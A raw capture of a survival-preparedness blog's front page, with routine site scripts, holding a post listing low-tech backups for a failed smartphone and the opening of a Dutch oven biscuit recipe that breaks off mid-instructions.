f=l.style;f.cssText=n;return(""+f.backgroundImage).indexOf("gradient")>-1});o.addTest("fileinput",function(){if(navigator.userAgent.match(/(Android (1.0|1.1|1.5|1.6|2.0|2.1))|(Windows Phone (OS 7|8.0))|(XBLWP)|(ZuneWP)|(w(eb)?OSBrowser)|(webOS)|(Kindle\/(1.0|2.0|2.5|3.0))/)){return false}var e=g("input");e.type="file";return!e.disabled});o.addTest("srcset","srcset"in g("img"));var E=g("input");var y="autocomplete autofocus list placeholder max min multiple pattern required step".split(" ");var B={};o.input=function(t){for(var n=0,r=t.length;n<r;n++){B[t[n]]=!!(t[n]in E)}if(B.list){B.list=!!(g("datalist")&&e.HTMLDataListElement)}return B}(y);var b="CSS"in e&&"supports"in e.CSS;var x="supportsCSS"in e;o.addTest("supports",b||x);var w=i._config.usePrefixes?v.split(" "):[];i._cssomPrefixes=w;var Q=function(t){var r=s.length;var a=e.CSSRule;var i;if(typeof a==="undefined"){return n}if(!t){return false}t=t.replace(/^@/,"");i=t.replace(/-/g,"_").toUpperCase()+"_RULE";if(i in a){return"@"+t}for(var o=0;o<r;o++){var l=s[o];var f=l.toUpperCase()+"_"+i;if(f in a){return"@-"+l.toLowerCase()+"-"+t}}return false};i.atRule=Q;function T(e,t){return!!~(""+e).indexOf(t)}function C(){var e=t.body;if(!e){e=g(c?"svg":"body");e.fake=true}return e}function S(e,n,r,a){var i="modernizr";var o;var s;var l;var f;var c=g("div");var d=C();if(parseInt(r,10)){while(r--){l=g("div");l.id=a?a[r]:i+(r+1);c.appendChild(l)}}o=g("style");o.type="text/css";o.id="s"+i;(!d.fake?c:d).appendChild(o);d.appendChild(c);if(o.styleSheet){o.styleSheet.cssText=e}else{o.appendChild(t.createTextNode(e))}c.id=i;if(d.fake){d.style.background="";d.style.overflow="hidden";f=u.style.overflow;u.style.overflow="hidden";u.appendChild(d)}s=n(c,e);if(d.fake){d.parentNode.removeChild(d);u.style.overflow=f;u.offsetHeight}else{c.parentNode.removeChild(c)}return!!s}var k=i.testStyles=S;o.addTest("touchevents",function(){var n;if("ontouchstart"in e||e.DocumentTouch&&t instanceof DocumentTouch){n=true}else{var r=["@media (",s.join("touch-enabled),("),"heartz",")","{#modernizr{top:9px;position:absolute}}"].join("");k(r,function(e){n=e.offsetTop===9})}return n});o.addTest("formvalidation",function(){var t=g("form");if(!("checkValidity"in t)||!("addEventListener"in t)){return false}if("reportValidity"in t){return true}var n=false;var r;o.formvalidationapi=true;t.addEventListener("submit",function(t){if(!e.opera||e.operamini){t.preventDefault()}t.stopPropagation()},false);t.innerHTML='<input name="modTest" required="required" /><button></button>';k("#modernizr form{position:absolute;top:-99999em}",function(e){e.appendChild(t);r=t.getElementsByTagName("input")[0];r.addEventListener("invalid",function(e){n=true;e.preventDefault();e.stopPropagation()},false);o.formvalidationmessage=!!r.validationMessage;t.getElementsByTagName("button")[0].click()});return n});var R;(function(){var e={}.hasOwnProperty;if(!l(e,"undefined")&&!l(e.call,"undefined")){R=function(t,n){return e.call(t,n)}}else{R=function(e,t){return t in e&&l(e.constructor.prototype[t],"undefined")}}})();i._l={};i.on=function(e,t){if(!this._l[e]){this._l[e]=[]}this._l[e].push(t);if(o.hasOwnProperty(e)){setTimeout(function(){o._trigger(e,o[e])},0)}};i._trigger=function(e,t){if(!this._l[e]){return}var n=this._l[e];setTimeout(function(){var e,r;for(e=0;e<n.length;e++){r=n[e];r(t)}},0);delete this._l[e]};function P(e,t){if(typeof e=="object"){for(var n in e){if(R(e,n)){P(n,e[n])}}}else{e=e.toLowerCase();var r=e.split(".");var a=o[r[0]];if(r.length==2){a=a[r[1]]}if(typeof a!="undefined"){return o}t=typeof t=="function"?t():t;if(r.length==1){o[r[0]]=t}else{if(o[r[0]]&&!(o[r[0]]instanceof Boolean)){o[r[0]]=new Boolean(o[r[0]])}o[r[0]][r[1]]=t}d([(!!t&&t!=false?"":"no-")+r.join("-")]);o._trigger(e,t)}return o}o._q.push(function(){i.addTest=P});o.addAsyncTest(function(){var e=new Image;e.onerror=function(){P("exiforientation",false,{aliases:["exif-orientation"]})};e.onload=function(){P("exiforientation",e.width!==2,{aliases:["exif-orientation"]})};e.src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQEAYABgAAD/4QAiRXhpZgAASUkqAAgAAAABABIBAwABAAAABgASAAAAAAD/2wBDAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQH/2wBDAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQH/wAARCAABAAIDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD+/iiiigD/2Q=="});function D(e,t){return function(){return e.apply(t,arguments)}}function L(e,t,n){var r;for(var a in e){if(e[a]in t){if(n===false){return e[a]}r=t[e[a]];if(l(r,"function")){return D(r,n||t)}return r}}return false}var _={elem:g("modernizr")};o._q.push(function(){delete _.elem});var F={style:_.elem.style};o._q.unshift(function(){delete F.style});function O(e){return e.replace(/([A-Z])/g,function(e,t){return"-"+t.toLowerCase()}).replace(/^ms-/,"-ms-")}function j(t,n,r){var a;if("getComputedStyle"in e){a=getComputedStyle.call(e,t,n);var i=e.console;if(a!==null){if(r){a=a.getPropertyValue(r)}}else{if(i){var o=i.error?"error":"log";i[o].call(i,"getComputedStyle returning null, its possible modernizr test results are inaccurate")}}}else{a=!n&&t.currentStyle&&t.currentStyle[r]}return a}function N(t,r){var a=t.length;if("CSS"in e&&"supports"in e.CSS){while(a--){if(e.CSS.supports(O(t[a]),r)){return true}}return false}else if("CSSSupportsRule"in e){var i=[];while(a--){i.push("("+O(t[a])+":"+r+")")}i=i.join(" or ");return S("@supports ("+i+") { #modernizr { position: absolute; } }",function(e){return j(e,null,"position")=="absolute"})}return n}function I(e,t,r,a){a=l(a,"undefined")?false:a;if(!l(r,"undefined")){var i=N(e,r);if(!l(i,"undefined")){return i}}var o,s,f,u,c;var d=["modernizr","tspan","samp"];while(!F.style&&d.length){o=true;F.modElem=g(d.shift());F.style=F.modElem.style}function p(){if(o){delete F.style;delete F.modElem}}f=e.length;for(s=0;s<f;s++){u=e[s];c=F.style[u];if(T(u,"-")){u=A(u)}if(F.style[u]!==n){if(!a&&!l(r,"undefined")){try{F.style[u]=r}catch(e){}if(F.style[u]!=c){p();return t=="pfx"?u:true}}else{p();return t=="pfx"?u:true}}}p();return false}var U=i.testProp=function(e,t,r){return I([e],n,t,r)};function z(e,t,n,r,a){var i=e.charAt(0).toUpperCase()+e.slice(1),o=(e+" "+w.join(i+" ")+i).split(" ");if(l(t,"string")||l(t,"undefined")){return I(o,t,r,a)}else{o=(e+" "+m.join(i+" ")+i).split(" ");return L(o,t,n)}}i.testAllProps=z;var M=i.prefixed=function(e,t,n){if(e.indexOf("@")===0){return Q(e)}if(e.indexOf("-")!=-1){e=A(e)}if(!t){return z(e,"pfx")}else{return z(e,t,n)}};o.addTest("fullscreen",!!(M("exitFullscreen",t,false)||M("cancelFullScreen",t,false)));function q(e,t,r){return z(e,n,n,t,r)}i.testAllProps=q;o.addTest("cssanimations",q("animationName","a",true));o.addTest("backgroundsize",q("backgroundSize","100%",true));(function(){o.addTest("csscolumns",function(){var e=false;var t=q("columnCount");try{e=!!t;if(e){e=new Boolean(e)}}catch(e){}return e});var e=["Width","Span","Fill","Gap","Rule","RuleColor","RuleStyle","RuleWidth","BreakBefore","BreakAfter","BreakInside"];var t,n;for(var r=0;r<e.length;r++){t=e[r].toLowerCase();n=q("column"+e[r]);if(t==="breakbefore"||t==="breakafter"||t=="breakinside"){n=n||q(e[r])}o.addTest("csscolumns."+t,n)}})();o.addTest("cssgridlegacy",q("grid-columns","10px",true));o.addTest("cssgrid",q("grid-template-rows","none",true));o.addTest("flexbox",q("flexBasis","1px",true));o.addTest("flexboxlegacy",q("boxDirection","reverse",true));o.addTest("cssmask",q("maskRepeat","repeat-x",true));o.addTest("csstransforms",function(){return navigator.userAgent.indexOf("Android 2.")===-1&&q("transform","scale(1)",true)});o.addTest("csstransforms3d",function(){return!!q("perspective","1px",true)});o.addTest("backgroundcliptext",function(){return q("backgroundClip","text")});f();d(r);delete i.addTest;delete i.addAsyncTest;for(var H=0;H<o._q.length;H++){o._q[H]()}e.Modernizr=o})(window,document);
0
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Sensible Survival | Common sense preparedness for sensible people</title> <!--[if lt IE 8]> <link rel="stylesheet" type="text/css" media="screen" href="https://s2.wp.com/wp-content/themes/pub/titan/stylesheets/ie.css" /> <![endif]--> <!--[if lte IE 7]> <script type="text/javascript" src="https://s2.wp.com/wp-content/themes/pub/titan/javascripts/nav.js"></script> <![endif]--> <link rel="pingback" href="https://sensiblesurvival.org/xmlrpc.php" /> <!-- Async WordPress.com Remote Login --> <script id="wpcom_remote_login_js"> var wpcom_remote_login_extra_auth = ''; function wpcom_remote_login_remove_dom_node_id( element_id ) { var dom_node = document.getElementById( element_id ); if ( dom_node ) { dom_node.remove(); } } function wpcom_remote_login_remove_dom_node_classes( class_name ) { var dom_nodes = document.querySelectorAll( '.' + class_name ); for ( var i = 0; i < dom_nodes.length; i++ ) { dom_nodes[i].remove(); } } function wpcom_remote_login_final_cleanup() { wpcom_remote_login_remove_dom_node_classes( "wpcom_remote_login_msg" ); wpcom_remote_login_remove_dom_node_id( "wpcom_remote_login_key" ); wpcom_remote_login_remove_dom_node_id( "wpcom_remote_login_validate" ); wpcom_remote_login_remove_dom_node_id( "wpcom_remote_login_js" ); wpcom_remote_login_remove_dom_node_id( "wpcom_request_access_iframe" ); wpcom_remote_login_remove_dom_node_id( "wpcom_request_access_styles" ); } // Watch for messages back from the remote login window.addEventListener( "message", function( e ) { if ( e.origin === "https://r-login.wordpress.com" ) { var data = {}; try { data = JSON.parse( e.data ); } catch( e ) { wpcom_remote_login_final_cleanup(); return; } if ( data.msg === 'LOGIN' ) { // Clean up the login check iframe wpcom_remote_login_remove_dom_node_id( "wpcom_remote_login_key" ); var id_regex = new RegExp( /^[0-9]+$/ ); var token_regex = new RegExp( /^.*|.*|.*$/ ); if ( token_regex.test( data.token ) && id_regex.test( data.wpcomid ) ) { // We have everything we need to ask for a login var script = document.createElement( "script" ); script.setAttribute( "id", "wpcom_remote_login_validate" ); script.src = '/remote-login.php?wpcom_remote_login=validate' + '&wpcomid=' + data.wpcomid + '&token=' + encodeURIComponent( data.token ) + '&host=' + window.location.protocol + '//' + window.location.hostname; document.body.appendChild( script ); } return; } // Safari ITP, not logged in, so redirect if ( data.msg === 'LOGIN-REDIRECT' ) { window.location = 'https://wordpress.com/log-in?redirect_to=' + window.location.href; return; } // Safari ITP, storage access failed, remove the request if ( data.msg === 'LOGIN-REMOVE' ) { var css_zap = 'html { -webkit-transition: margin-top 1s; transition: margin-top 1s; } /* 9001 */ html { margin-top: 0 !important; } * html body { margin-top: 0 !important; } @media screen and ( max-width: 782px ) { html { margin-top: 0 !important; } * html body { margin-top: 0 !important; } }'; var style_zap = document.createElement( 'style' ); style_zap.type = 'text/css'; style_zap.appendChild( document.createTextNode( css_zap ) ); document.body.appendChild( style_zap ); var e = document.getElementById( 'wpcom_request_access_iframe' ); e.parentNode.removeChild( e ); document.cookie = 'wordpress_com_login_access=denied; path=/; max-age=31536000'; return; } // Safari ITP if ( data.msg === 'REQUEST_ACCESS' ) { console.log( 'request access: safari' ); // Check ITP iframe enable/disable knob if ( wpcom_remote_login_extra_auth !== 'safari_itp_iframe' ) { return; } // If we are in a "private window" there is no ITP. var private_window = false; try { var opendb = window.openDatabase( null, null, null, null ); } catch( e ) { private_window = true; } if ( private_window ) { console.log( 'private window' ); return; } var iframe = document.createElement( 'iframe' ); iframe.id = 'wpcom_request_access_iframe'; iframe.setAttribute( 'scrolling', 'no' ); iframe.setAttribute( 'sandbox', 'allow-storage-access-by-user-activation allow-scripts allow-same-origin allow-top-navigation-by-user-activation' ); iframe.src = 'https://r-login.wordpress.com/remote-login.php?wpcom_remote_login=request_access&origin=' + encodeURIComponent( data.origin ) + '&wpcomid=' + encodeURIComponent( data.wpcomid ); var css = 'html { -webkit-transition: margin-top 1s; transition: margin-top 1s; } /* 9001 */ html { margin-top: 46px !important; } * html body { margin-top: 46px !important; } @media screen and ( max-width: 660px ) { html { margin-top: 71px !important; } * html body { margin-top: 71px !important; } #wpcom_request_access_iframe { display: block; height: 71px !important; } } #wpcom_request_access_iframe { border: 0px; height: 46px; position: fixed; top: 0; left: 0; width: 100%; min-width: 100%; z-index: 99999; background: #23282d; } '; var style = document.createElement( 'style' ); style.type = 'text/css'; style.id = 'wpcom_request_access_styles'; style.appendChild( document.createTextNode( css ) ); document.body.appendChild( style ); document.body.appendChild( iframe ); } if ( data.msg === 'DONE' ) { wpcom_remote_login_final_cleanup(); } } }, false ); // Inject the remote login iframe after the page has had a chance to load // more critical resources window.addEventListener( "DOMContentLoaded", function( e ) { var iframe = document.createElement( "iframe" ); iframe.style.display = "none"; iframe.setAttribute( "scrolling", "no" ); iframe.setAttribute( "id", "wpcom_remote_login_key" ); iframe.src = "https://r-login.wordpress.com/remote-login.php" + "?wpcom_remote_login=key" + "&origin=aHR0cHM6Ly9zZW5zaWJsZXN1cnZpdmFsLm9yZw%3D%3D" + "&wpcomid=29864982" + "&time=1558023330"; document.body.appendChild( iframe ); }, false ); </script> <link rel='dns-prefetch' href='//s2.wp.com' /> <link rel='dns-prefetch' href='//s1.wp.com' /> <link rel='dns-prefetch' href='//sensiblesurvival.wordpress.com' /> <link rel='dns-prefetch' href='//s0.wp.com' /> <link rel="alternate" type="application/rss+xml" title="Sensible Survival &raquo; Feed" href="https://sensiblesurvival.org/feed/" /> <link rel="alternate" type="application/rss+xml" title="Sensible Survival &raquo; Comments Feed" href="https://sensiblesurvival.org/comments/feed/" /> <script type="text/javascript"> /* <![CDATA[ */ function addLoadEvent(func) { var oldonload = window.onload; if (typeof window.onload != 'function') { window.onload = func; } else { window.onload = function () { oldonload(); func(); } } } /* ]]> */ </script> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s0.wp.com\/wp-content\/mu-plugins\/wpcom-smileys\/twemoji\/2\/72x72\/","ext":".png","svgUrl":"https:\/\/s0.wp.com\/wp-content\/mu-plugins\/wpcom-smileys\/twemoji\/2\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/s1.wp.com\/wp-includes\/js\/wp-emoji-release.min.js?m=1556893897h&ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='all-css-0-1' href='https://s1.wp.com/_static/??-eJyFkd1uwyAMhV9o1Ou6rlfTngWIm7rFgMCoytvPSbZM+xG7QcfW+Qw+wD0bn6JgFOBmcmgjxQr37BObyhRw+lHtfK0P8DcW6IYVrijZ+ptZqp6d4pkiybSJzUzRhzboLG3AQFXAhbSMdMWWCapMAXdMsTfep4La52xldjAOZDEgq62HcX75pGZ50VW6W6zpOJcL1mr0ZGps5KIX/ebWNuTmQEhs/NjkX5sGslrNct0KEMQkpEzdRO+hIyajKVqhFL8V5hwslR5aUPMfVY7Lj3yVM/TGr/vj8fT0vD8dHq/vxfzfIg==?cssminify=yes' type='text/css' media='all' /> <link rel='stylesheet' id='print-css-1-1' href='https://s2.wp.com/wp-content/mu-plugins/global-print/global-print.css?m=1465851035h&cssminify=yes' type='text/css' media='print' /> <link rel='stylesheet' id='all-css-2-1' href='https://s0.wp.com/_static/??/wp-content/mu-plugins/actionbar/actionbar.css,/wp-content/themes/h4/global.css?m=1516985148j&cssminify=yes' type='text/css' media='all' /> <script type='text/javascript' src='https://s0.wp.com/_static/??-eJyF0FEKwjAMBuAL2RVdh0/iWWqNI3VNa5M69PRWmIhQFQJ5yAf5Ez0nheSmcgTWvtalQL4trfO80r+ACjhmK9AFpBd2kQRInjZFlgDMdoTGNMQDTqAKQ66ApK45xYb7jIR0RZj/Mg+SrDurDIx3aB3C6Z35+wcWtQ+79TCYTd9vjfEPs3xy+Q=='></script> <link rel='stylesheet' id='all-css-0-2' href='https://s0.wp.com/wp-content/mu-plugins/highlander-comments/style.css?m=1530132353h&cssminify=yes' type='text/css' media='all' /> <!--[if lt IE 8]> <link rel='stylesheet' id='highlander-comments-ie7-css' href='https://s2.wp.com/wp-content/mu-plugins/highlander-comments/style-ie7.css?m=1351637563h&#038;ver=20110606' type='text/css' media='all' /> <![endif]--> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://sensiblesurvival.wordpress.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://s1.wp.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress.com" /> <link rel='shortlink' href='https://wp.me/21jfg' /> <!-- Jetpack Open Graph Tags --> <meta property="og:type" content="website" /> <meta property="og:title" content="Sensible Survival" /> <meta property="og:description" content="Common sense preparedness for sensible people" /> <meta property="og:url" content="https://sensiblesurvival.org/" /> <meta property="og:site_name" content="Sensible Survival" /> <meta property="og:image" content="https://s0.wp.com/i/blank.jpg" /> <meta property="og:locale" content="en_US" /> <meta name="twitter:site" content="@wordpressdotcom" /> <!-- End Jetpack Open Graph Tags --> <link rel="shortcut icon" type="image/x-icon" href="https://s1.wp.com/i/favicon.ico" sizes="16x16 24x24 32x32 48x48" /> <link rel="icon" type="image/x-icon" href="https://s1.wp.com/i/favicon.ico" sizes="16x16 24x24 32x32 48x48" /> <link rel="apple-touch-icon-precomposed" href="https://s2.wp.com/i/webclip.png" /> <link rel='openid.server' href='https://sensiblesurvival.wordpress.com/?openidserver=1' /> <link rel='openid.delegate' href='https://sensiblesurvival.wordpress.com/' /> <link rel="search" type="application/opensearchdescription+xml" href="https://sensiblesurvival.org/osd.xml" title="Sensible Survival" /> <link rel="search" type="application/opensearchdescription+xml" href="https://s1.wp.com/opensearch.xml" title="WordPress.com" /> <meta name="application-name" content="Sensible Survival" /><meta name="msapplication-window" content="width=device-width;height=device-height" /><meta name="msapplication-tooltip" content="Common sense preparedness for sensible people" /><meta name="msapplication-task" content="name=Subscribe;action-uri=https://sensiblesurvival.org/feed/;icon-uri=https://s1.wp.com/i/favicon.ico" /><meta name="msapplication-task" content="name=Sign up for a free blog;action-uri=http://wordpress.com/signup/;icon-uri=https://s1.wp.com/i/favicon.ico" /><meta name="msapplication-task" content="name=WordPress.com Support;action-uri=http://support.wordpress.com/;icon-uri=https://s1.wp.com/i/favicon.ico" /><meta name="msapplication-task" content="name=WordPress.com Forums;action-uri=http://forums.wordpress.com/;icon-uri=https://s1.wp.com/i/favicon.ico" /><meta name="description" content="Common sense preparedness for sensible people" /> <style type="text/css" id="syntaxhighlighteranchor"></style> </head> <body class="home blog mp6 customizer-styles-applied highlander-enabled highlander-light infinite-scroll neverending"> <div class="skip-content"><a href="#content">Skip to content</a></div> <div id="header" class="clear"> <div id="follow"> <div class="wrapper clear"> <dl> <dt>Follow:</dt> <dd><a class="rss" href="https://sensiblesurvival.org/feed/">RSS</a></dd> <dd><a class="twitter" href="http://twitter.com/">Twitter</a></dd> </dl> </div><!--end wrapper--> </div><!--end follow--> <div class="wrapper"> <h1 id="title"> <a href="https://sensiblesurvival.org/">Sensible Survival</a> </h1> <div id="description"> Common sense preparedness for sensible people </div><!--end description--> </div><!--end wrapper--> <div id="navigation"> <ul id="nav" class="wrapper"> <li class="page_item current_page_item"><a href="https://sensiblesurvival.org/">Home</a></li> <li class="page_item page-item-2"><a href="https://sensiblesurvival.org/about/">Contact</a></li> </ul> </div><!--end navigation--> </div><!--end header--> <div class="content-background"> <div class="wrapper"> <div class="notice"> </div><!--end notice--> <div id="content"> <div id="post-3352" class="post-3352 post type-post status-publish format-standard hentry category-home-power-heat-light-and-communications category-uncategorized"> <div class="post-header"> <div class="date"><a href="https://sensiblesurvival.org/2018/08/24/13-things-youll-wish-you-had-when-your-smart-phone-is-useless/">August 24, 2018</a></div> <h2><a href="https://sensiblesurvival.org/2018/08/24/13-things-youll-wish-you-had-when-your-smart-phone-is-useless/" rel="bookmark" title="Permanent Link to 13 Things You’ll Wish You had when Your Smart Phone is&nbsp;Useless">13 Things You’ll Wish You had when Your Smart Phone is&nbsp;Useless</a></h2> <div class="author"> </div> </div><!--end post header--> <div class="entry clear"> <p>I recently watched a video called “Thirty Things Your Iphone has Replaced.”  It’s pretty interesting to see how many things that used to be common accessories in everyone’s homes 25 years ago, have been made obsolete by the smart phone.  One good example would be that most families used to have a set of encyclopedias.  Who buys encyclopedias now that you can go on your internet connected smart phone and look up anything you want?</p> <p>But, this video got me to thinking about the flip-side of the smart phone as an information multi-tool.  What would happen if your smart phone was suddenly rendered useless?  What items would you wish that you had if your smart phone cratered?  What follows is a short list for your consideration:</p> <p>Communication Devices</p> <p>Although it is used for many other purposes, the smart phone is still primarily a means of communication.  The network of cell towers that supports this technology is extremely vulnerable to EMP attacks.  If an EMP attack ever occurred, cell phone service would probably end.  Some alternatives to the cell phone might include hardwired field telephones for close by communication, rechargeable walkie-talkies and CB base stations for wider area (but still fairly limited) communications, and shortwave radio for long distance communication.</p> <p>Compass</p> <p>It never fails to amaze me when people show up for a survival class and expect to use the compass tool on their cell phone as a real compass.  No, no, no, no!  So many things can go wrong with a cell phone or its related infrastructure.  They are far too unreliable to ever take the place of a real compass.  Spend the $10 and buy a real compass to stick in you bug out bag or glove box.</p> <p>Maps</p> <p>Google Maps and various GPS applications have made paper maps virtually obsolete.  Don’t fall into this trap.  You need to at least have a state road map.  Better still; buy several topographic maps of the area around your home.</p> <p>Flashlight</p> <p>Everybody uses the flashlight on their smart phone.  Yes, it’s very convenient, but have a back-up.  You need an LED flashlight, rechargeable batteries, and a solar battery charger.</p> <p>Books</p> <p>No more looking things up on Google, no more reading e-books from Amazon; you’re going to have to go old school.  It’s a shame that books take up so much space, but it’s a burden you’ll just have to bare.  You’ll need books on gardening, plant identification, canning and food preservation,  first aid and medical guides, repair manuals, gunsmithing books; all of the practical how-to books that you can find.  You’ll need books for entertainment (stick to the timeless classics), and don’t forget the children’s books.  If you have room throw in a set of encyclopedias.</p> <p>Games</p> <p>You won’t be playing Candy Crunch on your smart phone anymore.  Buy a deck of cards, some dominoes, a few dice, a set of checkers with board, and a chess set.  A few old school board games wouldn’t hurt either.  Yatzee once got my wife and I through six months without electricity when we were young.  Also, definitely buy a copy of <u>Hoyle’s Rules of Games</u>.  It has the rules and how to play every card and dice game you’ve ever heard of and a bunch that you haven’t heard of.</p> <p>Pencil and Paper</p> <p>Everybody takes notes, makes grocery lists, etc on their smart phones.  Without a working smart phone you’ll need to do it the old fashioned way with a paper and pencil.  Buy yourself a couple of boxes of pencils and a few spiral notebooks.  They don’t take up much space, and they could come in very handy.</p> <p>Musical Instrument</p> <p>You won’t be listening to that play list anymore after your smart phone bites the dust.  How about learning to play a musical instrument?  My wife and I belong to a re-enactment group that uses no gear more modern than 1836.  We always have a campfire with a group sing-along.  One person plays guitar, a couple of people play the boron (a kind of Celtic hand drum), one plays the harmonica, and another plays the penny whistle and sometimes the fiddle.  The rest of us sing along loudly and poorly, and we all have a great time.</p> <p>Weather Instruments</p> <p>No more weather app, so buy yourself a thermometer, a barometer, and a rain gauge.  Learn a little about cloud formations and weather prediction.</p> <p>Calendar</p> <p>The calendar and alerts function on your smart phone is very handy; but if your smart phone is useless, you’ll wish that you had an old time paper calendar.  Some businesses still give them away for free, or you can buy one or print one off of the internet.</p> <p>Self Winding Watch</p> <p>Hardly anyone under the age of 50 wears a wristwatch any more.  Most people just glance down at the screen of their ever present smart phone.  Knowing the exact time may not be all that important in a survival situation, but if you feel the need to know the time you will need an old fashioned wrist watch.  I would recommend a good quality self winding watch so you don’t have to worry about batteries running out.  I had a not so high quality self winder that lasted for over 10 years without repair.  Hey, if you have deep pockets buy a Rolex and you’ll probably be fixed for life.</p> <p>Photo Album</p> <p>If you have pictures that mean a lot to you; spouse, children, parents, etc; print them out and put them in a photo album.  You should do this anyway.  You could lose or damage your phone, and the pictures would be lost.</p> <p>Solar Powered Calculator</p> <p>Unless you are an engineer or a math teacher you probably depend on the calculator on your smart phone.  You really should buy an inexpensive solar powered calculator as a back-up in case your smart phone becomes useless.</p> <p>Well, there’s my little list.  Now, I have to admit that I don’t even own a smart phone, so I’m sure that some of you smart phone owners can come up with a lot of things that should be added to this list.  If you think of anything feel free to add it in the comments section below.</p> <p>&nbsp;</p> </div><!--end entry--> <div class="post-footer"> <div class="comments"> <a href="https://sensiblesurvival.org/2018/08/24/13-things-youll-wish-you-had-when-your-smart-phone-is-useless/#comments">5 Comments</a> </div><!-- .comments --> </div><!--end post footer--> </div><!--end post--> <div id="post-3327" class="post-3327 post type-post status-publish format-standard hentry category-food-preparation-and-recipes tag-camp-cooking tag-campfire-biscuits tag-cooking-biscuits-from-scratch tag-cooking-biscuits-on-a-campfire tag-dutch-oven-biscuits tag-dutch-oven-cooking"> <div class="post-header"> <div class="date"><a href="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/">July 26, 2018</a></div> <h2><a href="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/" rel="bookmark" title="Permanent Link to Make Dutch Oven&nbsp;Biscuits">Make Dutch Oven&nbsp;Biscuits</a></h2> <div class="author"> </div> </div><!--end post header--> <div class="entry clear"> <p>Let me start off by saying that there are a lot of different recipes for biscuits, and several different methods of cooking them in a Dutch oven.  I don’t claim to have the ultimate biscuit cooking knowledge.  This recipe for biscuits is what I would call a survivalist recipe.  It uses only basic ingredients that can be stored for a good while; no butter, or milk, or buttermilk, etc.  You can change the recipe to make a tastier biscuit; but, truth is, these are not too shabby.</p> <p>The cooking equipment that you’ll need is:</p> <p>Medium size mixing bowl</p> <p>Half-cup measure</p> <p>Teaspoon measure</p> <p>Bowl or coffee pot to hold water</p> <p>Fork</p> <p>Dutch oven</p> <p>Biscuit pan</p> <p>3 lug nuts or small stones to put under the biscuit pan</p> <p>Lid lifter</p> <p>Camp shovel</p> <p>&nbsp;</p> <p>The recipe ingredients are:</p> <p>2 cups self-rising flour</p> <p>1 teaspoon salt</p> <p>½ cup vegetable shortening or lard</p> <p>Water</p> <p>&nbsp;</p> <p>Before you mix up your biscuit dough you need to build a good hardwood fire.  